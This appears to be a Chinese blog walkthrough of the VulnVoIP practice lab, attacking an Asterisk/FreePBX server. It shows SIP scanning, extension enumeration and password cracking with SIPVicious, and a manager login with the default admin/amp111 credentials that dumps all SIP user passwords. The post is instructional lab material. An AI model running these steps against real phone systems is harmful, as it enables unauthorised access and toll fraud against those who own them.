VulnVoIP

最新推荐文章于 2024-01-04 18:28:46 发布

Nixawk

最新推荐文章于 2024-01-04 18:28:46 发布

阅读量3.6k

点赞数

分类专栏： Pentest Lab

本文链接：https://blog.csdn.net/nixawk/article/details/43673641

版权

Pentest Lab 专栏收录该内容

12 篇文章 0 订阅

订阅专栏

VOIP Pentesting

目标: 192.168.108.196
目的: 了解VoIP相关安全问题

VOIP 简介

VoIP (Voice over IP, IP语音传输)说的是通过一个IP网络来传输语音信息。 VoIP的具体实现可以简单到两名用户之间的点到点语音通信，也可以是一个电信级的基础架构。可以为顾客和终端用户提供新型通信服务。大多数VoIP解决方案都使用了多种通信协议，至少有一个用于信令、一个用于传输经过编码的语音信息。目前最常用的两种信令协议是 H.323 和 SIP (Session Initation Protocol, 会话发起协议), 它们的角色是对VoIP通信过程的会话建立、切换和挂断动作进行管理。

H.323 其实是由ITU组织(International Telecommunication Union, 国际电信联合会)定制的一组协议的统称，它采用的编码协议是ASN.1。 H.323协议的实现容量要比SIP大。 ITU制定这组协议的目的是为了把VoIP技术与公共交换电话网(public switched telephone network, PSTN) 更简便地集成到一起。

SIP协议是由IETF组织制定的, 它的实现容量正在迅速增加, 其中有不少是从H.323协议转过来的。 SIP 不仅可以用来建立语音通信, 还可以支持一系列其他的解决方案和工具, 如”即时消息”(Instant Messaging, IM)等。 SIP在风格上与HTTP协议类似, 它在会话的建立和切断方面实现了不同的方法和响应代码。通常使用 5060 (TCP/UDP) 号端口进行通信。这些方法和响应码如下两个表:

INVITE     - 为一个新会话发起的信息  
ACK        - 邀请应答
BYE        - 关闭一个存在的会话
CANCEL     - 取消所有队列中的请求
OPTIONS    - 确定服务容量
REGISTER   - SIP地点注册

与HTTP一样, 响应也采用编码方式分类.

SIP 1xx    - 信息类的回应消息
SIP 2xx    - 成功的回应消息
SIP 3xx    - 重定向回应
SIP 4xx    - 客户端请求失败

RTP (Real-time Transport Protocol, 实时传输协议) 负责传输结果编码的语音信息。 RTP 的控制信道 RTCP(Real-time Control Protocol, 实时控制协议)提供, 主要由QoS(Quality of Service, 服务质量) 信息 (延迟、数据包丢失率、噪音等)构成。 RTP的底层通信协议是UDP, 源端口和目的端口都可以动态分配 (UDP/5004 号端口比较多见) 。 RTP不处理QoS信息, 这些信息由网络本身的某些现有功能(数据包/桢的标识、分类和队列功能)负责处理。

传统的PBX语音网络与VoIP解决方案有一个主要的区别: 在一个VoIP网络里， RTP通信流不经过任何语音交换设备，经过编码的RTP通信数据包可以直接在两个端点之间进行交换(也就是说, RTP是从电话到电话).

VoIP (Voice and IP) 攻击

VoIP网络容易遭受很多种攻击。这主要是因为以下几项事实: VoIP用户必须使用多种接口和协议、网络的服务质量是VoIP系统通信的关键因素、整个VoIP系统往往相当复杂等。

通过TFTP攻击VoIP
通过SIP用户攻击
通过SIP漏洞攻击

探测主机开放 tcp/udp 端口, 获取端口相关的服务信息.

[nixawk@core share]$ nmap -A -n -p 22,53,80,111,907,3306,4445,5038 192.168.108.196

Starting Nmap 6.47 ( http://nmap.org ) at 2015-02-09 02:43 UTC
Nmap scan report for 192.168.108.196
Host is up (0.00066s latency).
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 1f:e2:e8:9e:2c:f8:31:39:36:f7:1d:aa:77:5e:ac:76 (DSA)
|_  2048 38:a4:9d:29:8a:11:9d:e1:13:5d:5e:6d:76:a6:63:76 (RSA)
53/tcp   open  domain     dnsmasq 2.45
| dns-nsid: 
|_  bind.version: dnsmasq-2.45
80/tcp   open  http       Apache httpd 2.2.3 ((CentOS))
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: FreePBX
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            904/udp  status
|_  100024  1            907/tcp  status
907/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
4445/tcp open  upnotifyp?
5038/tcp open  asterisk   Asterisk Call Manager 1.1

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.95 seconds

上述扫描结果可以看出, 5038/tcp 提供 Asterisk Call Manager 1.1.

Asterisk[1] 是一个开放源代码的软件VoIP PBX系统，它是一个运行在Linux环境下的纯软件实施方案。Asterisk是一种功能非常齐全的应用程序，提供了许多电信功能，能够把你的x86机器变成你自己的交换机，还能够当作一台企业级的商用交换机。Asterisk让人激动的事情是它在小企业预算可承受的范围内提供了商业交换机的功能和可伸缩性。你可以使用一台老式的奔腾3计算机，让你的机构看起来就同世界上的大企业一样.

[From: http://en.wikipedia.org/wiki/Asterisk]

VoIP 安全工具

VoIP 主要与语音相关，例如: 打电话，视频等。在攻击任何系统之前, 我们需要先进行扫描以便找出合适的对象。定位SIP代理变或其他SIP设备的过程称为SIP扫描。接下来介绍一下相关的安全检测工具。

SIPVicious - http://code.google.com/p/sipvicious/

[nixawk@core sipvicious-0.2.8]$ ls -l
total 144
-rw-r--r-- 1 nixawk nixawk  8359 Dec 10  2012 Changelog
drwxr-xr-x 3 nixawk nixawk  4096 Feb  9 03:10 libs
drwxr-xr-x 3 nixawk nixawk  4096 Dec 10  2012 man1
-rw-r--r-- 1 nixawk nixawk  1212 Dec 10  2012 README.md
drwxr-xr-x 3 nixawk nixawk  4096 Dec 10  2012 resources
-rwxr-xr-x 1 nixawk nixawk 23831 Dec 10  2012 svcrack.py
-rwxr-xr-x 1 nixawk nixawk  7026 Dec 10  2012 svcrash.py
-rwxr-xr-x 1 nixawk nixawk 25185 Dec 10  2012 svmap.py
-rwxr-xr-x 1 nixawk nixawk 12956 Dec 10  2012 svreport.py
-rwxr-xr-x 1 nixawk nixawk 29001 Dec 10  2012 svwar.py
-rw-r--r-- 1 nixawk nixawk   367 Dec 10  2012 THANKS
-rw-r--r-- 1 nixawk nixawk    80 Dec 10  2012 TODO

使用Metasploit扫描方法如下:

msf auxiliary(enumerator) > use auxiliary/scanner/sip/options
msf auxiliary(options) > show options

Module options (auxiliary/scanner/sip/options):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   THREADS    10               yes       The number of concurrent threads
   TO         nobody           no        The destination username to probe at each host

msf auxiliary(options) > set RHOSTS 10.1.255.24
RHOSTS => 10.1.255.24
msf auxiliary(options) > run

[*] Sending SIP UDP OPTIONS requests to 10.1.255.24->10.1.255.24 (1 hosts)
[*] 10.1.255.24:5060 udp SIP/2.0 200 OK: {"Server"=>"Asterisk PBX 1.6.2.11", "Allow"=>"INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

svmap

一款 sip 扫描器. 可针对目标IP范围进行扫描, 它可以按某种方式去识别SIP服务器, 或去识别主机的端口.
svwar

获取电话机上的 working extension lines. A working extension is one that can be registered. 同样也可以告诉你, 扩展线是否需要身份验证.
svcrack

针对身份认证的密码破解器, 对注册服务器和代理服务器都有效. 目前的破解模式, 支持数字范围和字典文件.
svreport

管理会话, 可导出为pdf, xml, csv and plain text.
svcrash

响应 svwar 和 svcrack 的SIP信息, 导致老版本崩溃.

svmap

默认svmap扫描的是5060端口, 可使用 -p 选项自定义端口.

[nixawk@core sipvicious-0.2.8]$ python ./svmap.py -p 5038 192.168.108.196
WARNING:root:found nothing

-s name 可保存测试会话数据, -d 为debug模式(显示更加详尽的信息)

[nixawk@core sipvicious-0.2.8]$ python svmap.py -d -p 5060 -m INVITE -s victim001 192.168.108.196
('192.168.108.196', 5060)
SIP/2.0 100 Trying
Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060
From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333
To: "sipvicious"<sip:100@1.1.1.1>
Call-ID: 662015948337022026087404
CSeq: 1 INVITE
Server: Asterisk PBX 1.6.2.11
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
Contact: <sip:100@192.168.108.196>
Content-Length: 0


('192.168.108.196', 5060)
SIP/2.0 503 Service Unavailable
Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060
From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333
To: "sipvicious"<sip:100@1.1.1.1>;tag=as11f7ed52
Call-ID: 662015948337022026087404
CSeq: 1 INVITE
Server: Asterisk PBX 1.6.2.11
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
X-Asterisk-HangupCause: Unknown
X-Asterisk-HangupCauseCode: 20
Content-Length: 0


('192.168.108.196', 5060)
SIP/2.0 503 Service Unavailable
Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060
From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333
To: "sipvicious"<sip:100@1.1.1.1>;tag=as11f7ed52
Call-ID: 662015948337022026087404
CSeq: 1 INVITE
Server: Asterisk PBX 1.6.2.11
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
X-Asterisk-HangupCause: Unknown
X-Asterisk-HangupCauseCode: 20
Content-Length: 0


('192.168.108.196', 5060)
SIP/2.0 503 Service Unavailable
Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060
From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333
To: "sipvicious"<sip:100@1.1.1.1>;tag=as11f7ed52
Call-ID: 662015948337022026087404
CSeq: 1 INVITE
Server: Asterisk PBX 1.6.2.11
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
X-Asterisk-HangupCause: Unknown
X-Asterisk-HangupCauseCode: 20
Content-Length: 0


('192.168.108.196', 5060)
SIP/2.0 503 Service Unavailable
Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060
From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333
To: "sipvicious"<sip:100@1.1.1.1>;tag=as11f7ed52
Call-ID: 662015948337022026087404
CSeq: 1 INVITE
Server: Asterisk PBX 1.6.2.11
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
X-Asterisk-HangupCause: Unknown
X-Asterisk-HangupCauseCode: 20
Content-Length: 0


| SIP Device           | User Agent            | Fingerprint |
--------------------------------------------------------------
| 192.168.108.196:5060 | Asterisk PBX 1.6.2.11 | disabled    |

msf auxiliary(options) > show options 

Module options (auxiliary/scanner/sip/options):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS     192.168.108.195  yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   THREADS    10               yes       The number of concurrent threads
   TO         nobody           no        The destination username to probe at each host

msf auxiliary(options) > run

[*] Sending SIP UDP OPTIONS requests to 192.168.108.195->192.168.108.195 (1 hosts)
[*] 192.168.108.195:5060 udp SIP/2.0 404 Not Found: {"Server"=>"Asterisk PBX 1.8.13.1~dfsg1-3+deb7u3", "Allow"=>"INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS 192.168.108.196
RHOSTS => 192.168.108.196
msf auxiliary(options) > run

[*] Sending SIP UDP OPTIONS requests to 192.168.108.196->192.168.108.196 (1 hosts)
[*] 192.168.108.196:5060 udp SIP/2.0 200 OK: {"Server"=>"Asterisk PBX 1.6.2.11", "Allow"=>"INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

svreport

svmap.py 测试完成后, 可将会话数据导出为各种格式.

[nixawk@core sipvicious-0.2.8]$ python svreport.py export -f txt -o victim001.txt -s victim001

[nixawk@core sipvicious-0.2.8]$ cat victim001.txt 
| Host                 | User Agent            | Resolved        |
------------------------------------------------------------------
| 192.168.108.196:5060 | Asterisk PBX 1.6.2.11 | [not available] |

svwar

-D 使用默认的扩展号去做扫描, 可使用 -e 参数自行指定.

观察电话世界，每个电话或应答者都是一个用户，每个分机都有一个用户名，这也是电话系统的用户标示机制(称为呼叫方ID)。和电脑上用户帐户的机制是一样的，每一个用户就是一个电话或一个分机，而是由于要访问一些有权限的信息(比如语音信箱)，这种用户名机制更显得重要。这些一般是4-6位的数字会作为身份认证信息的一半；另一半则是4-6位的PIN码。如果你以前没有意识到分机号的价值，你现在应该明白了。下面我们就开始探讨枚举这些信息的价值。除了传统的人工和之前提到的自动轰炸拨打攻击方法之外，我们还能够通过简单地观察一台服务器的响应从而枚举出VoIP的分机号。记住，SIP基于很容易读懂的请求和回应协议，因此可以轻松地用来分析，并且与服务器进行交互。SIP网关遵循同一个基本的规范，但这并不意味着它们编写的方式相同。当对付Asterisk和SIP Express Router(两种开源的SIP网关)时，我们将会看到它们在泄漏信息的时候各有千秋。

Asterisk REGISTER 用户枚举
SIP Express Router OPTIONS 用户枚举

[nixawk@core sipvicious-0.2.8]$ python ./svwar.py -D -m INVITE 192.168.108.196
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
WARNING:TakeASip:extension '100' probably exists but the response is unexpected
WARNING:TakeASip:extension '100' probably exists but the response is unexpected
| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 2000      | reqauth        |
| 102       | reqauth        |
| 100       | weird          |
| 101       | reqauth        |

svcrack

破解对应的线路. Asterisk Call Manager 默认管理口令为:

Username: admin
Password: amp111

[nixawk@core sipvicious-0.2.8]$ python ./svcrack.py -u 2000 -d ~/share/pwd.txt 192.168.108.196 
ERROR:ASipOfRedWine:We got an unknown response
| Extension | Password    |
---------------------------
| 2000      | password123 |

Asterisk Call Manager 默认帐户为 admin/amp111, 尝试登录
C:\Users\nfs>ncat -v 192.168.108.196 5038
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Connected to 192.168.108.196:5038.
Asterisk Call Manager/1.1
action: login
username: admin
secret: amp111

Response: Success
Message: Authentication accepted

action: command
command: sip show users

Response: Follows
Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  NAT
100                                                          from-internal    Yes  Always
101                        s3cur3                            from-internal    Yes  Always
102                        letmein123                        from-internal    Yes  Always
201                        secret123                         from-internal    Yes  Always
200                        quit3s3curE123                    from-internal    Yes  Always
2000                       password123                       from-internal    Yes  Always

SIP Clients

jitsi - https://jitsi.org/index.php/Main/Download
ekiga - http://ekiga.org/

Now, we can use account(2000) to call account(101).

VOIP CALL

SIP Commands

下面列出SIP常用指令:

action: command
command: core show help
                             ! Execute a shell command
                    ael reload Reload AEL configuration
ael set debug {read|tokens|mac Enable AEL debugging flags
                 agi dump html Dumps a list of AGI commands in HTML format
                      agi exec Add AGI command to a channel in Async AGI
        agi set debug [on|off] Enable/Disable AGI debugging
     agi show commands [topic] List AGI commands or specific help
               cdr show status Display the CDR status
             channel originate Originate a call
              channel redirect Redirect a call
        channel request hangup Request a hangup on a given channel
         cli check permissions Try a permissions config for a user
        cli reload permissions Reload CLI permissions config
              cli show aliases Show CLI command aliases
          cli show permissions Show CLI permissions
                   config list Show all files that have loaded a configuration file
                 config reload Force a reload on modules using a particular configuration file
           core abort shutdown Cancel a running shutdown
            core clear profile Clear profiling info
       core ping taskprocessor Ping a named task processor
       core restart gracefully Restart Asterisk gracefully
              core restart now Restart Asterisk immediately
  core restart when convenient Restart Asterisk at empty call volume
        core set debug channel Enable/disable debugging on a channel
      core set {debug|verbose} Set level of debug/verbose chattiness
core show applications [like|d Shows registered dialplan applications
         core show application Describe a specific dialplan application
      core show calls [uptime] Display information on calls
core show channels [concise|ve Display information on channels
             core show channel Display information on a specific channel
        core show channeltypes List available channel types
         core show channeltype Give more details on that channel type
core show codecs [audio|video| Displays a list of codecs
               core show codec Shows a specific codec
     core show config mappings Display config mappings (file names to config engines)
        core show file formats Displays file formats
 core show file version [like] List versions of files used to build Asterisk
    core show functions [like] Shows registered dialplan functions
            core show function Describe a specific dialplan function
                core show help Display help list, or specific help on a command
               core show hints Show dialplan hints
                core show hint Show dialplan hint
       core show image formats Displays image formats
             core show license Show the license(s) for this copy of Asterisk
             core show profile Display profiling info
            core show settings Show some core settings
            core show switches Show alternative switches
             core show sysinfo Show System Information
      core show taskprocessors List instantiated task processors and statistics
             core show threads Show running threads
core show translation [recalc] Display translation matrix
    core show uptime [seconds] Show uptime information
             core show version Display version info
            core show warranty Show the warranty (if any) for this copy of Asterisk
          core stop gracefully Gracefully shut down Asterisk
                 core stop now Shut down Asterisk immediately
     core stop when convenient Shut down Asterisk at empty call volume
          core waitfullybooted Wait for Asterisk to be fully booted
         dahdi destroy channel Destroy a channel
                 dahdi restart Fully restart DAHDI channels
                 dahdi set dnd Sets/resets DND (Do Not Disturb) mode on a channel
              dahdi set hwgain Set hardware gain on a channel
              dahdi set swgain Set software gain on a channel
           dahdi show cadences List cadences
dahdi show channels [trunkgrou Show active DAHDI channels
            dahdi show channel Show information on a channel
             dahdi show status Show all DAHDI cards status
            dahdi show version Show the DAHDI version in use
                  database del Removes database key/value
              database deltree Removes database keytree/values
                  database get Gets database value
                  database put Adds/updates database value
                 database show Shows database contents
              database showkey Shows database contents
               devstate change Change a custom device state
                 devstate list List currently known custom device states
        dialplan add extension Add new extension into context
        dialplan add ignorepat Add new ignore pattern
          dialplan add include Include context in other context
                dialplan debug Show fast extension pattern matching data structures
               dialplan reload Reload extensions and *only* extensions
     dialplan remove extension Remove a specified extension
     dialplan remove ignorepat Remove ignore pattern from context
       dialplan remove include Remove a specified include from context
          dialplan set chanvar Set a channel variable
dialplan set extenpatternmatch Use the Old extension pattern matching algorithm.
dialplan set extenpatternmatch Use the New extension pattern matching algorithm.
           dialplan set global Set global dialplan variable
         dialplan show chanvar Show channel variables
         dialplan show globals Show global dialplan variables
                 dialplan show Show dialplan
                dnsmgr refresh Performs an immediate refresh
                 dnsmgr reload Reloads the DNS manager configuration
                 dnsmgr status Display the DNS manager status
               features reload Reloads configured features
                 features show Lists configured features
                  file convert Convert audio file
           group show channels Display active channels with group(s)
              http show status Display HTTP server status
                iax2 provision Provision an IAX device
           iax2 prune realtime Prune a cached realtime lookup
                   iax2 reload Reload IAX configuration
  iax2 set debug {on|off|peer} Enable/Disable IAX debugging
    iax2 set debug jb {on|off} Enable/Disable IAX jitterbuffer debugging
 iax2 set debug trunk {on|off} Enable/Disable IAX trunk debugging
                  iax2 set mtu Set the IAX systemwide trunking MTU
               iax2 show cache Display IAX cached dialplan
    iax2 show callnumber usage Show current entries in IP call number limit table
            iax2 show channels List active IAX channels
            iax2 show firmware List available IAX firmware
            iax2 show netstats List active IAX channel netstats
                iax2 show peer Show details on specific IAX peer
               iax2 show peers List defined IAX peers
        iax2 show provisioning Display iax provisioning
            iax2 show registry Display IAX registration status
               iax2 show stats Display IAX statistics
             iax2 show threads Display IAX helper thread info
        iax2 show users [like] List defined IAX users
             iax2 test losspct Set IAX2 incoming frame loss percentage
               iax2 unregister Unregister (force expiration) an IAX2 peer from the registry
                indication add Add the given indication to the country
             indication remove Remove the given indication from the country
               indication show Display a list of all countries/indications
                     keys init Initialize RSA key passcodes
                     keys show Displays RSA key information
           local show channels List status of local channels
                   logger mute Toggle logging output to a console
                 logger reload Reopens the log files
                 logger rotate Rotates and reopens the log files
logger set level {DEBUG|NOTICE Enables/Disables a specific logging level for this console
          logger show channels List configured log channels
                manager reload Reload manager configurations
    manager set debug [on|off] Show, enable, disable debugging of the manager code
          manager show command Show a manager interface command
         manager show commands List manager interface commands
        manager show connected List connected manager interface users
           manager show eventq List manager interface queued events
            manager show users List configured manager users
             manager show user Display information on a specific manager user
meetme {lock|unlock|mute|unmut Execute a command on a conference or conferee
         meetme list [concise] List all or one conference
     mfcr2 call files [on|off] Enable/Disable MFC/R2 call files
             mfcr2 set blocked Reset MFC/R2 channel forcing it to BLOCKED
               mfcr2 set debug Set MFC/R2 channel logging level
                mfcr2 set idle Reset MFC/R2 channel forcing it to IDLE
mfcr2 show channels [group|con Show MFC/R2 channels
           mfcr2 show variants Show supported MFC/R2 variants
            mfcr2 show version Show OpenR2 library version
           mgcp audit endpoint Audit specified MGCP endpoint
                   mgcp reload Reload MGCP configuration
       mgcp set debug {on|off} Enable/Disable MGCP debugging
           mgcp show endpoints List defined MGCP endpoints
          minivm list accounts List defined mini-voicemail boxes
         minivm list templates List message templates
             minivm list zones List zone message formats
                 minivm reload Reload Mini-voicemail configuration
          minivm show settings Show mini-voicemail general settings
             minivm show stats Show some mini-voicemail statistics
       mixmonitor {start|stop} Execute a MixMonitor command
                   module load Load a module by name
                 module reload Reload configuration
            module show [like] List modules and info
                 module unload Unload a module by name
                    moh reload Reload MusicOnHold
              moh show classes List MusicOnHold classes
                moh show files List MusicOnHold file-based classes
              no debug channel Disable debugging on channel(s)
              parkedcalls show List currently parked calls
         phoneprov show routes Show registered phoneprov http routes
pri set debug {on|off|0|1|2} s Enables PRI debugging on a span
            pri set debug file Sends PRI debug output to the specified file
                pri show debug Displays current PRI debug settings
                pri show spans Displays PRI Information
                 pri show span Displays PRI Information
              pri show version Displays libpri version
              queue add member Add a channel to a specified queue
queue reload {parameters|membe Reload queues, members, queue rules, or parameters
           queue remove member Removes a channel from a specified queue
             queue reset stats Reset statistics for a queue
             queue set penalty Set penalty for a channel of a specified queue
                    queue show Show status of a specified queue
  queue {pause|unpause} member Pause or unpause a queue member
              queue show rules Show the rules defined in queuerules.conf
              realtime destroy Delete a row from a RealTime database
                 realtime load Used to print out RealTime variables.
                realtime store Store a new row into a RealTime database
               realtime update Used to update RealTime variables.
              realtime update2 Used to test the RealTime update2 method
    rtcp set debug {on|off|ip} Enable/Disable RTCP debugging
       rtcp set stats {on|off} Enable/Disable RTCP stats
     rtp set debug {on|off|ip} Enable/Disable RTP debugging
            say load [new|old] Set or show the say mode
                    sip notify Send a notify packet to a SIP peer
 sip prune realtime [peer|all] Prune cached Realtime users/peers
              sip qualify peer Send an OPTIONS packet to a peer
                    sip reload Reload SIP configuration
sip set debug {on|off|ip|peer} Enable/Disable SIP debugging
      sip set history {on|off} Enable/Disable SIP history
sip show {channels|subscriptio List active SIP channels or subscriptions
         sip show channelstats List statistics for active SIP channels
              sip show channel Show detailed SIP channel info
              sip show domains List our local SIP domains
              sip show history Show SIP dialog history
                sip show inuse List all inuse/limits
                  sip show mwi Show MWI subscriptions
              sip show objects List all SIP object allocations
                sip show peers List defined SIP peers
                 sip show peer Show details on specific SIP peer
             sip show registry List SIP registration status
                sip show sched Present a report on the status of the sched queue
             sip show settings Show SIP global settings
                  sip show tcp List TCP Connections
                sip show users List defined SIP users
                 sip show user Show details on specific SIP user
                sip unregister Unregister (force expiration) a SIP peer from the registry
             sla show stations Show SLA Stations
               sla show trunks Show SLA Trunks
                 ss7 block cic Blocks the given CIC
             ss7 block linkset Blocks all CICs on a linkset
ss7 set debug {on|off} linkset Enables SS7 debugging on a linkset
              ss7 show linkset Shows the status of a linkset
              ss7 show version Displays libss7 version
               ss7 unblock cic Unblocks the given CIC
           ss7 unblock linkset Unblocks all CICs on a linkset
       stun set debug {on|off} Enable/Disable STUN debugging
                   timing test Run a timing test
               transcoder show Display DAHDI transcoder utilization.
   udptl set debug {on|off|ip} Enable/Disable UDPTL debugging
                        ulimit Set or show process resource limits
              voicemail reload Reload voicemail configuration
          voicemail show users List defined voicemail boxes
          voicemail show zones List zone message formats

action: command
command: agi show commands

Response: Follows
Privilege: Command
 Dead                        Command   Description
   No                         answer   Answer channel
  Yes                 asyncagi break   Interrupts Async AGI
   No                 channel status   Returns status of the connected channel.
  Yes                   database del   Removes database key/value
  Yes               database deltree   Removes database keytree/value
  Yes                   database get   Gets database value
  Yes                   database put   Adds/updates database value
  Yes                           exec   Executes a given Application
   No                       get data   Prompts for DTMF on a channel
  Yes              get full variable   Evaluates a channel expression
   No                     get option   Stream file, prompt for DTMF, with timeout.
  Yes                   get variable   Gets a channel variable.
   No                         hangup   Hangup the current channel.
  Yes                           noop   Does nothing.
   No                   receive char   Receives one character from channels supporting it
   No                   receive text   Receives text from channels supporting it
   No                    record file   Records to a given file
   No                      say alpha   Says a given character string
   No                     say digits   Says a given digit string
   No                     say number   Says a given number
   No                   say phonetic   Says a given character string with phonetics
   No                       say date   Says a given date
   No                       say time   Says a given time
   No                   say datetime   Says a given time as specfied by the format given
   No                     send image   Sends images to channels supporting it
   No                      send text   Sends text to channels supporting it
   No                 set autohangup   Autohangup channel in some time
   No                   set callerid   Sets callerid for the current channel
   No                    set context   Sets channel context
   No                  set extension   Changes channel extension
   No                      set music   Enable/Disable Music on hold generator
   No                   set priority   Set channel dialplan priority
  Yes                   set variable   Sets a channel variable
   No                    stream file   Sends audio file on channel
   No            control stream file   Sends audio file on channel and allows the listner to control the
   No                       tdd mode   Toggles TDD mode (for the deaf)
  Yes                        verbose   Logs a message to the asterisk verbose log
   No                 wait for digit   Waits for a digit to be pressed
   No                  speech create   Creates a speech object
   No                     speech set   Sets a speech engine setting
  Yes                 speech destroy   Destroys a speech object
   No            speech load grammar   Loads a grammar
  Yes          speech unload grammar   Unloads a grammar
   No        speech activate grammar   Activates a grammar
   No      speech deactivate grammar   Deactivates a grammar
   No               speech recognize   Recognizes speech
   No                          gosub   Execute a dialplan subroutine

上述代码示例1:

action: command
command: config list

Response: Follows
Privilege: Command
core                 /etc/asterisk/asterisk.conf
cdr_csv              /etc/asterisk/cdr.conf
cdr                  /etc/asterisk/cdr.conf
chan_dahdi           /etc/asterisk/chan_dahdi.conf
chan_dahdi           /etc/asterisk/chan_dahdi_additional.conf
chan_dahdi           /etc/asterisk/chan_dahdi_general.conf
chan_dahdi           /etc/asterisk/chan_dahdi_groups.conf
enum                 /etc/asterisk/enum.conf
pbx_config           /etc/asterisk/extensions.conf
pbx_config           /etc/asterisk/extensions_additional.conf
pbx_config           /etc/asterisk/extensions_custom.conf
pbx_config           /etc/asterisk/extensions_override_freepbx.conf
features             /etc/asterisk/features.conf
features             /etc/asterisk/features_applicationmap_additional.conf
features             /etc/asterisk/features_applicationmap_custom.conf
features             /etc/asterisk/features_featuremap_additional.conf
features             /etc/asterisk/features_featuremap_custom.conf
features             /etc/asterisk/features_general_additional.conf
features             /etc/asterisk/features_general_custom.conf
pbx_config           /etc/asterisk/globals_custom.conf
chan_iax2            /etc/asterisk/iax.conf
chan_iax2            /etc/asterisk/iax_additional.conf
chan_iax2            /etc/asterisk/iax_custom.conf
chan_iax2            /etc/asterisk/iax_custom_post.conf
chan_iax2            /etc/asterisk/iax_general_additional.conf
chan_iax2            /etc/asterisk/iax_general_custom.conf
chan_iax2            /etc/asterisk/iax_registrations.conf
chan_iax2            /etc/asterisk/iax_registrations_custom.conf
indications          /etc/asterisk/indications.conf
logger               /etc/asterisk/logger.conf
manager              /etc/asterisk/manager.conf
manager              /etc/asterisk/manager_additional.conf
manager              /etc/asterisk/manager_custom.conf
app_meetme           /etc/asterisk/meetme.conf
app_meetme           /etc/asterisk/meetme_additional.conf
core                 /etc/asterisk/modules.conf
res_musiconhold      /etc/asterisk/musiconhold.conf
res_musiconhold      /etc/asterisk/musiconhold_additional.conf
res_musiconhold      /etc/asterisk/musiconhold_custom.conf
chan_phone           /etc/asterisk/phone.conf
app_queue            /etc/asterisk/queues.conf
app_queue            /etc/asterisk/queues_additional.conf
app_queue            /etc/asterisk/queues_custom.conf
app_queue            /etc/asterisk/queues_custom_general.conf
app_queue            /etc/asterisk/queues_general_additional.conf
app_queue            /etc/asterisk/queues_post_custom.conf
rtp                  /etc/asterisk/rtp.conf
chan_sip             /etc/asterisk/sip.conf
res_phoneprov        /etc/asterisk/sip.conf
chan_sip             /etc/asterisk/sip_additional.conf
res_phoneprov        /etc/asterisk/sip_additional.conf
chan_sip             /etc/asterisk/sip_custom.conf
res_phoneprov        /etc/asterisk/sip_custom.conf
chan_sip             /etc/asterisk/sip_custom_post.conf
res_phoneprov        /etc/asterisk/sip_custom_post.conf
chan_sip             /etc/asterisk/sip_general_additional.conf
res_phoneprov        /etc/asterisk/sip_general_additional.conf
chan_sip             /etc/asterisk/sip_general_custom.conf
res_phoneprov        /etc/asterisk/sip_general_custom.conf
chan_sip             /etc/asterisk/sip_nat.conf
res_phoneprov        /etc/asterisk/sip_nat.conf
chan_sip             /etc/asterisk/sip_registrations.conf
res_phoneprov        /etc/asterisk/sip_registrations.conf
chan_sip             /etc/asterisk/sip_registrations_custom.conf
res_phoneprov        /etc/asterisk/sip_registrations_custom.conf
app_voicemail        /etc/asterisk/vm_email.inc
app_voicemail        /etc/asterisk/vm_general.inc
app_voicemail        /etc/asterisk/voicemail.conf

上述代码示例2:

action: command
command: sip show users

Response: Follows
